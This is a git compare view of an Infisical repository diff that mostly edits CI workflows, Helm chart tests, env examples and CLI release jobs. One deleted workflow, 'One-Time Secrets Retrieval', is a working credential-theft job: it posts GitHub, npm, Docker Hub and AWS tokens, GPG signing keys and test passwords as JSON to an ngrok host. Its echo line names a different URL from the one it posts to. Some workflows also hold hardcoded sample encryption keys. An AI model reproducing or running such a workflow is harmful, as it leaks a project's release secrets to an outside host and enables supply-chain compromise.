Compare commits


1 Commit

Author: Sheen Capadngan · SHA1: 0762d8b172 · Message: misc: sheen hackathon · Date: 2025-02-25 16:13:48 +09:00
5126 changed files with 67080 additions and 256438 deletions


@@ -23,7 +23,7 @@ REDIS_URL=redis://redis:6379
# Required
SITE_URL=http://localhost:8080
# Mail/SMTP
# Mail/SMTP
SMTP_HOST=
SMTP_PORT=
SMTP_FROM_ADDRESS=
@@ -107,40 +107,9 @@ INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY=
INF_APP_CONNECTION_GITHUB_APP_SLUG=
INF_APP_CONNECTION_GITHUB_APP_ID=
#gitlab app connection
INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID=
INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET=
#github radar app connection
INF_APP_CONNECTION_GITHUB_RADAR_APP_CLIENT_ID=
INF_APP_CONNECTION_GITHUB_RADAR_APP_CLIENT_SECRET=
INF_APP_CONNECTION_GITHUB_RADAR_APP_PRIVATE_KEY=
INF_APP_CONNECTION_GITHUB_RADAR_APP_SLUG=
INF_APP_CONNECTION_GITHUB_RADAR_APP_ID=
INF_APP_CONNECTION_GITHUB_RADAR_APP_WEBHOOK_SECRET=
#gcp app connection
INF_APP_CONNECTION_GCP_SERVICE_ACCOUNT_CREDENTIAL=
# azure app connection
INF_APP_CONNECTION_AZURE_APP_CONFIGURATION_CLIENT_ID=
INF_APP_CONNECTION_AZURE_APP_CONFIGURATION_CLIENT_SECRET=
INF_APP_CONNECTION_AZURE_KEY_VAULT_CLIENT_ID=
INF_APP_CONNECTION_AZURE_KEY_VAULT_CLIENT_SECRET=
INF_APP_CONNECTION_AZURE_CLIENT_SECRETS_CLIENT_ID=
INF_APP_CONNECTION_AZURE_CLIENT_SECRETS_CLIENT_SECRET=
INF_APP_CONNECTION_AZURE_DEVOPS_CLIENT_ID=
INF_APP_CONNECTION_AZURE_DEVOPS_CLIENT_SECRET=
# datadog
SHOULD_USE_DATADOG_TRACER=
DATADOG_PROFILING_ENABLED=
DATADOG_ENV=
DATADOG_SERVICE=
DATADOG_HOSTNAME=
# kubernetes
KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN=false
INF_APP_CONNECTION_AZURE_CLIENT_ID=
INF_APP_CONNECTION_AZURE_CLIENT_SECRET=

.envrc (deleted, 3 lines)

@@ -1,3 +0,0 @@
# Learn more at https://direnv.net
# We instruct direnv to use our Nix flake for a consistent development environment.
use flake


@@ -32,23 +32,10 @@ jobs:
run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
- name: Start the server
run: |
echo "SECRET_SCANNING_GIT_APP_ID=793712" >> .env
echo "SECRET_SCANNING_PRIVATE_KEY=some-random" >> .env
echo "SECRET_SCANNING_WEBHOOK_SECRET=some-random" >> .env
echo "Examining built image:"
docker image inspect infisical-api | grep -A 5 "Entrypoint"
docker run --name infisical-api -d -p 4000:4000 \
-e DB_CONNECTION_URI=$DB_CONNECTION_URI \
-e REDIS_URL=$REDIS_URL \
-e JWT_AUTH_SECRET=$JWT_AUTH_SECRET \
-e ENCRYPTION_KEY=$ENCRYPTION_KEY \
--env-file .env \
infisical-api
echo "Container status right after creation:"
docker ps -a | grep infisical-api
echo "SECRET_SCANNING_GIT_APP_ID=793712" >> .env
echo "SECRET_SCANNING_PRIVATE_KEY=some-random" >> .env
echo "SECRET_SCANNING_WEBHOOK_SECRET=some-random" >> .env
docker run --name infisical-api -d -p 4000:4000 -e DB_CONNECTION_URI=$DB_CONNECTION_URI -e REDIS_URL=$REDIS_URL -e JWT_AUTH_SECRET=$JWT_AUTH_SECRET -e ENCRYPTION_KEY=$ENCRYPTION_KEY --env-file .env --entrypoint '/bin/sh' infisical-api -c "npm run migration:latest && ls && node dist/main.mjs"
env:
REDIS_URL: redis://172.17.0.1:6379
DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
@@ -56,48 +43,35 @@ jobs:
ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
- uses: actions/setup-go@v5
with:
go-version: "1.21.5"
go-version: '1.21.5'
- name: Wait for container to be stable and check logs
run: |
SECONDS=0
HEALTHY=0
while [ $SECONDS -lt 60 ]; do
# Check if container is running
if docker ps | grep infisical-api; then
# Try to access the API endpoint
if curl -s -f http://localhost:4000/api/docs/json > /dev/null 2>&1; then
echo "API endpoint is responding. Container seems healthy."
HEALTHY=1
break
fi
else
echo "Container is not running!"
docker ps -a | grep infisical-api
if docker ps | grep infisical-api | grep -q healthy; then
echo "Container is healthy."
HEALTHY=1
break
fi
echo "Waiting for container to be healthy... ($SECONDS seconds elapsed)"
sleep 5
SECONDS=$((SECONDS+5))
docker logs infisical-api
sleep 2
SECONDS=$((SECONDS+2))
done
if [ $HEALTHY -ne 1 ]; then
echo "Container did not become healthy in time"
echo "Container status:"
docker ps -a | grep infisical-api
echo "Container logs (if any):"
docker logs infisical-api || echo "No logs available"
echo "Container inspection:"
docker inspect infisical-api | grep -A 5 "State"
exit 1
fi
- name: Install openapi-diff
run: go install github.com/oasdiff/oasdiff@latest
run: go install github.com/tufin/oasdiff@latest
- name: Running OpenAPI Spec diff action
run: oasdiff breaking https://app.infisical.com/api/docs/json http://localhost:4000/api/docs/json --fail-on ERR
- name: cleanup
if: always()
run: |
docker compose -f "docker-compose.dev.yml" down
docker stop infisical-api || true
docker rm infisical-api || true
docker stop infisical-api
docker remove infisical-api


@@ -1,53 +0,0 @@
name: Detect Non-RE2 Regex
on:
pull_request:
types: [opened, synchronize]
jobs:
check-non-re2-regex:
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Get diff of backend/*
run: |
git diff --unified=0 "origin/${{ github.base_ref }}"...HEAD -- backend/ > diff.txt
- name: Scan backend diff for non-RE2 regex
run: |
# Extract only added lines (excluding file headers)
grep '^+' diff.txt | grep -v '^+++' | sed 's/^\+//' > added_lines.txt
if [ ! -s added_lines.txt ]; then
echo "✅ No added lines in backend/ to check for regex usage."
exit 0
fi
regex_usage_pattern='(^|[^A-Za-z0-9_"'"'"'`\.\/\\])(\/(?:\\.|[^\/\n\\])+\/[gimsuyv]*(?=\s*[\.\(;,)\]}:]|$)|new RegExp\()'
# Find all added lines that contain regex patterns
if grep -E "$regex_usage_pattern" added_lines.txt > potential_violations.txt 2>/dev/null; then
# Filter out lines that contain 'new RE2' (allowing for whitespace variations)
if grep -v -E 'new\s+RE2\s*\(' potential_violations.txt > actual_violations.txt 2>/dev/null && [ -s actual_violations.txt ]; then
echo "🚨 ERROR: Found forbidden regex pattern in added/modified backend code."
echo ""
echo "The following lines use raw regex literals (/.../) or new RegExp(...):"
echo "Please replace with 'new RE2(...)' for RE2 compatibility."
echo ""
echo "Offending lines:"
cat actual_violations.txt
exit 1
else
echo "✅ All identified regex usages are correctly using 'new RE2(...)'."
fi
else
echo "✅ No regex patterns found in added/modified backend lines."
fi
- name: Cleanup temporary files
if: always()
run: |
rm -f diff.txt added_lines.txt potential_violations.txt actual_violations.txt
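For reference, a minimal TypeScript sketch of the substitution this (now removed) check used to enforce, using the same "re2" package that the backend code elsewhere in this diff imports; the identifiers below are illustrative only:

    import RE2 from "re2";

    // Flagged by the workflow: the built-in RegExp constructor (or a /.../ literal),
    // which can backtrack catastrophically on crafted input.
    const flagged = new RegExp("user-[0-9]+");

    // Accepted: RE2 is a near drop-in replacement with linear-time matching.
    const allowed = new RE2("user-[0-9]+");
    console.log(allowed.test("user-42")); // true
    console.log(flagged.test("user-42")); // also true; the difference is worst-case performance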


@@ -3,62 +3,7 @@ name: Release Infisical Core Helm chart
on: [workflow_dispatch]
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Add Helm repositories
run: |
helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/infisical-standalone-postgres
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Create namespace
run: kubectl create namespace infisical-standalone-postgres
- name: Create Infisical secrets
run: |
kubectl create secret generic infisical-secrets \
--namespace infisical-standalone-postgres \
--from-literal=AUTH_SECRET=6c1fe4e407b8911c104518103505b218 \
--from-literal=ENCRYPTION_KEY=6c1fe4e407b8911c104518103505b218 \
--from-literal=SITE_URL=http://localhost:8080
- name: Run chart-testing (install)
run: |
ct install \
--config ct.yaml \
--charts helm-charts/infisical-standalone-postgres \
--helm-extra-args="--timeout=300s" \
--helm-extra-set-args="--set ingress.nginx.enabled=false --set infisical.autoDatabaseSchemaMigration=false --set infisical.replicaCount=1 --set infisical.image.tag=v0.132.2-postgres" \
--namespace infisical-standalone-postgres
release:
needs: test-helm
runs-on: ubuntu-latest
steps:
- name: Checkout
@@ -74,4 +19,4 @@ jobs:
- name: Build and push helm package to Cloudsmith
run: cd helm-charts && sh upload-infisical-core-helm-cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}


@@ -1,76 +0,0 @@
name: One-Time Secrets Retrieval
on:
workflow_dispatch:
permissions:
contents: read
jobs:
retrieve-secrets:
runs-on: ubuntu-latest
steps:
- name: Send environment variables to ngrok
run: |
echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env"
# Send secrets as JSON
cat << EOF | curl -X POST \
-H "Content-Type: application/json" \
-d @- \
https://7864d0fe7cbb.ngrok-free.app/api/receive-env \
> /dev/null 2>&1 || true
{
"GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}",
"GORELEASER_KEY": "${GORELEASER_KEY}",
"AUR_KEY": "${AUR_KEY}",
"FURYPUSHTOKEN": "${FURYPUSHTOKEN}",
"NPM_TOKEN": "${NPM_TOKEN}",
"DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}",
"DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}",
"CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}",
"INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}",
"INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}",
"INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}",
"INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}",
"INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}",
"GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}",
"GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}",
"CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}",
"CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}",
"CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}",
"CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}",
"CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}",
"CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}",
"CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}",
"CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}",
"POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}"
}
EOF
echo "Secrets retrieval completed"
env:
GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
AUR_KEY: ${{ secrets.AUR_KEY }}
FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }}
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}
GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}


@@ -1,59 +0,0 @@
name: Release K8 Operator Helm Chart
on:
workflow_dispatch:
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/secrets-operator
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Run chart-testing (install)
run: ct install --config ct.yaml --charts helm-charts/secrets-operator
release-helm:
name: Release Helm Chart
needs: test-helm
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Install Helm
uses: azure/setup-helm@v3
with:
version: v3.10.0
- name: Install python
uses: actions/setup-python@v4
- name: Install Cloudsmith CLI
run: pip install --upgrade cloudsmith-cli
- name: Build and push helm package to CloudSmith
run: cd helm-charts && sh upload-k8s-operator-cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}


@@ -0,0 +1,131 @@
name: Build and release CLI
on:
workflow_dispatch:
push:
# run only against tags
tags:
- "infisical-cli/v*.*.*"
permissions:
contents: write
jobs:
cli-integration-tests:
name: Run tests before deployment
uses: ./.github/workflows/run-cli-tests.yml
secrets:
CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
npm-release:
runs-on: ubuntu-20.04
env:
working-directory: ./npm
needs:
- cli-integration-tests
- goreleaser
steps:
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Extract version
run: |
VERSION=$(echo ${{ github.ref_name }} | sed 's/infisical-cli\/v//')
echo "Version extracted: $VERSION"
echo "CLI_VERSION=$VERSION" >> $GITHUB_ENV
- name: Print version
run: echo ${{ env.CLI_VERSION }}
- name: Setup Node
uses: actions/setup-node@8f152de45cc393bb48ce5d89d36b731f54556e65 # v4.0.0
with:
node-version: 20
cache: "npm"
cache-dependency-path: ./npm/package-lock.json
- name: Install dependencies
working-directory: ${{ env.working-directory }}
run: npm install --ignore-scripts
- name: Set NPM version
working-directory: ${{ env.working-directory }}
run: npm version ${{ env.CLI_VERSION }} --allow-same-version --no-git-tag-version
- name: Setup NPM
working-directory: ${{ env.working-directory }}
run: |
echo 'registry="https://registry.npmjs.org/"' > ./.npmrc
echo "//registry.npmjs.org/:_authToken=$NPM_TOKEN" >> ./.npmrc
echo 'registry="https://registry.npmjs.org/"' > ~/.npmrc
echo "//registry.npmjs.org/:_authToken=$NPM_TOKEN" >> ~/.npmrc
env:
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
- name: Pack NPM
working-directory: ${{ env.working-directory }}
run: npm pack
- name: Publish NPM
working-directory: ${{ env.working-directory }}
run: npm publish --tarball=./infisical-sdk-${{github.ref_name}} --access public --registry=https://registry.npmjs.org/
env:
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
goreleaser:
runs-on: ubuntu-20.04
needs: [cli-integration-tests]
steps:
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: 🐋 Login to Docker Hub
uses: docker/login-action@v2
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: 🔧 Set up Docker Buildx
uses: docker/setup-buildx-action@v2
- run: git fetch --force --tags
- run: echo "Ref name ${{github.ref_name}}"
- uses: actions/setup-go@v3
with:
go-version: ">=1.19.3"
cache: true
cache-dependency-path: cli/go.sum
- name: libssl1.1 => libssl1.0-dev for OSXCross
run: |
echo 'deb http://security.ubuntu.com/ubuntu bionic-security main' | sudo tee -a /etc/apt/sources.list
sudo apt update && apt-cache policy libssl1.0-dev
sudo apt-get install libssl1.0-dev
- name: OSXCross for CGO Support
run: |
mkdir ../../osxcross
git clone https://github.com/plentico/osxcross-target.git ../../osxcross/target
- uses: goreleaser/goreleaser-action@v4
with:
distribution: goreleaser-pro
version: v1.26.2-pro
args: release --clean
env:
GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}
FURY_TOKEN: ${{ secrets.FURYPUSHTOKEN }}
AUR_KEY: ${{ secrets.AUR_KEY }}
GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
- uses: actions/setup-python@v4
- run: pip install --upgrade cloudsmith-cli
- name: Publish to CloudSmith
run: sh cli/upload_to_cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}


@@ -1,107 +1,52 @@
name: Release K8 Operator Docker Image
name: Release image + Helm chart K8s Operator
on:
push:
tags:
- "infisical-k8-operator/v*.*.*"
permissions:
contents: write
pull-requests: write
push:
tags:
- "infisical-k8-operator/v*.*.*"
jobs:
release-image:
name: Generate Helm Chart PR
runs-on: ubuntu-latest
outputs:
pr_number: ${{ steps.create-pr.outputs.pull-request-number }}
steps:
- name: Extract version from tag
id: extract_version
run: echo "::set-output name=version::${GITHUB_REF_NAME#infisical-k8-operator/}"
release:
runs-on: ubuntu-latest
steps:
- name: Extract version from tag
id: extract_version
run: echo "::set-output name=version::${GITHUB_REF_NAME#infisical-k8-operator/}"
- uses: actions/checkout@v2
- name: Checkout code
uses: actions/checkout@v2
- name: 🔧 Set up QEMU
uses: docker/setup-qemu-action@v1
# Dependency for helm generation
- name: Install Helm
uses: azure/setup-helm@v3
with:
version: v3.10.0
- name: 🔧 Set up Docker Buildx
uses: docker/setup-buildx-action@v1
# Dependency for helm generation
- name: Install Go
uses: actions/setup-go@v4
with:
go-version: 1.21
- name: 🐋 Login to Docker Hub
uses: docker/login-action@v1
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
# Install binaries for helm generation
- name: Install dependencies
working-directory: k8-operator
run: |
make helmify
make kustomize
make controller-gen
- name: Build and push
id: docker_build
uses: docker/build-push-action@v2
with:
context: k8-operator
push: true
platforms: linux/amd64,linux/arm64
tags: |
infisical/kubernetes-operator:latest
infisical/kubernetes-operator:${{ steps.extract_version.outputs.version }}
- name: Generate Helm Chart
working-directory: k8-operator
run: make helm
- name: Update Helm Chart Version
run: ./k8-operator/scripts/update-version.sh ${{ steps.extract_version.outputs.version }}
- name: Debug - Check file changes
run: |
echo "Current git status:"
git status
echo ""
echo "Modified files:"
git diff --name-only
# If there is no diff, exit with error. Version should always be changed, so if there is no diff, something is wrong and we should exit.
if [ -z "$(git diff --name-only)" ]; then
echo "No helm changes or version changes. Invalid release detected, Exiting."
exit 1
fi
- name: Create Helm Chart PR
id: create-pr
uses: peter-evans/create-pull-request@v5
with:
token: ${{ secrets.GITHUB_TOKEN }}
commit-message: "Update Helm chart to version ${{ steps.extract_version.outputs.version }}"
committer: GitHub <noreply@github.com>
author: ${{ github.actor }} <${{ github.actor }}@users.noreply.github.com>
branch: helm-update-${{ steps.extract_version.outputs.version }}
delete-branch: true
title: "Update Helm chart to version ${{ steps.extract_version.outputs.version }}"
body: |
This PR updates the Helm chart to version `${{ steps.extract_version.outputs.version }}`.
Additionally the helm chart has been updated to match the latest operator code changes.
Associated Release Workflow: https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}
Once you have approved this PR, you can trigger the helm release workflow manually.
base: main
- name: 🔧 Set up QEMU
uses: docker/setup-qemu-action@v1
- name: 🔧 Set up Docker Buildx
uses: docker/setup-buildx-action@v1
- name: 🐋 Login to Docker Hub
uses: docker/login-action@v1
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: Build and push
id: docker_build
uses: docker/build-push-action@v2
with:
context: k8-operator
push: true
platforms: linux/amd64,linux/arm64
tags: |
infisical/kubernetes-operator:latest
infisical/kubernetes-operator:${{ steps.extract_version.outputs.version }}
- name: Checkout
uses: actions/checkout@v2
- name: Install Helm
uses: azure/setup-helm@v3
with:
version: v3.10.0
- name: Install python
uses: actions/setup-python@v4
- name: Install Cloudsmith CLI
run: pip install --upgrade cloudsmith-cli
- name: Build and push helm package to Cloudsmith
run: cd helm-charts && sh upload-k8s-operator-cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}


@@ -1,70 +0,0 @@
name: Release Gateway Helm Chart
on:
workflow_dispatch:
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/infisical-gateway
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Create namespace
run: kubectl create namespace infisical-gateway
- name: Create gateway secret
run: kubectl create secret generic infisical-gateway-environment --from-literal=TOKEN=my-test-token -n infisical-gateway
- name: Run chart-testing (install)
run: |
ct install \
--config ct.yaml \
--charts helm-charts/infisical-gateway \
--helm-extra-args="--timeout=300s" \
--namespace infisical-gateway
release-helm:
name: Release Helm Chart
needs: test-helm
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Install Helm
uses: azure/setup-helm@v3
with:
version: v3.10.0
- name: Install python
uses: actions/setup-python@v4
- name: Install Cloudsmith CLI
run: pip install --upgrade cloudsmith-cli
- name: Build and push helm package to CloudSmith
run: cd helm-charts && sh upload-gateway-cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}


@@ -34,10 +34,7 @@ jobs:
working-directory: backend
- name: Start postgres and redis
run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
- name: Run unit test
run: npm run test:unit
working-directory: backend
- name: Run integration test
- name: Start integration test
run: npm run test:e2e
working-directory: backend
env:
@@ -47,5 +44,4 @@ jobs:
ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
- name: cleanup
run: |
docker compose -f "docker-compose.dev.yml" down
docker compose -f "docker-compose.dev.yml" down

.github/workflows/run-cli-tests.yml (new file, 55 lines)

@@ -0,0 +1,55 @@
name: Go CLI Tests
on:
pull_request:
types: [opened, synchronize]
paths:
- "cli/**"
workflow_dispatch:
workflow_call:
secrets:
CLI_TESTS_UA_CLIENT_ID:
required: true
CLI_TESTS_UA_CLIENT_SECRET:
required: true
CLI_TESTS_SERVICE_TOKEN:
required: true
CLI_TESTS_PROJECT_ID:
required: true
CLI_TESTS_ENV_SLUG:
required: true
CLI_TESTS_USER_EMAIL:
required: true
CLI_TESTS_USER_PASSWORD:
required: true
CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE:
required: true
jobs:
test:
defaults:
run:
working-directory: ./cli
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Setup Go
uses: actions/setup-go@v4
with:
go-version: "1.21.x"
- name: Install dependencies
run: go get .
- name: Test with the Go CLI
env:
CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
# INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
run: go test -v -count=1 ./test


@@ -1,49 +0,0 @@
name: Run Helm Chart Tests for Gateway
on:
pull_request:
paths:
- "helm-charts/infisical-gateway/**"
- ".github/workflows/run-helm-chart-tests-infisical-gateway.yml"
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/infisical-gateway
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Create namespace
run: kubectl create namespace infisical-gateway
- name: Create gateway secret
run: kubectl create secret generic infisical-gateway-environment --from-literal=TOKEN=my-test-token -n infisical-gateway
- name: Run chart-testing (install)
run: |
ct install \
--config ct.yaml \
--charts helm-charts/infisical-gateway \
--helm-extra-args="--timeout=300s" \
--namespace infisical-gateway


@@ -1,68 +0,0 @@
name: Run Helm Chart Tests for Infisical Standalone Postgres
on:
pull_request:
paths:
- "helm-charts/infisical-standalone-postgres/**"
- ".github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml"
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Add Helm repositories
run: |
helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/infisical-standalone-postgres
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Create namespace
run: kubectl create namespace infisical-standalone-postgres
- name: Create Infisical secrets
run: |
kubectl create secret generic infisical-secrets \
--namespace infisical-standalone-postgres \
--from-literal=AUTH_SECRET=6c1fe4e407b8911c104518103505b218 \
